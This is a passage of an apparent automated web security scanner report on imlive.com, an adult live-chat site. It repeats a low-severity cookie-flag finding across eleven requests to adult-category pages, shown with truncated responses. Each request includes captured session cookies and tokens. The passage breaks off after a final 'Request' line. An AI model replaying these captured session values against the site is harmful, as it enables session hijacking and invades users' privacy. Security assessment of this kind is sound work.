The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/lesbian-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:23 GMT Connection: close Content-Length: 118643 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/lesbian/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:57 GMT Connection: close Content-Length: 32831 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/live-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:28 GMT Connection: close Content-Length: 24939 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/nude-chat/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:54 GMT Connection: close Content-Length: 23142 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/orgies/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:45 GMT Connection: close Content-Length: 48997 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/pornstars/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:17 GMT Connection: close Content-Length: 265777 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/role-play/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:46 GMT Connection: close Content-Length: 53291 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-galleries/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:17 GMT Connection: close Content-Length: 29247 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-photos/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:27 GMT Connection: close Content-Length: 25084 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-sessions/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:26 GMT Connection: close Content-Length: 25422 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-video-features/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:40 GMT Connection: close Content-Length: 31717 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
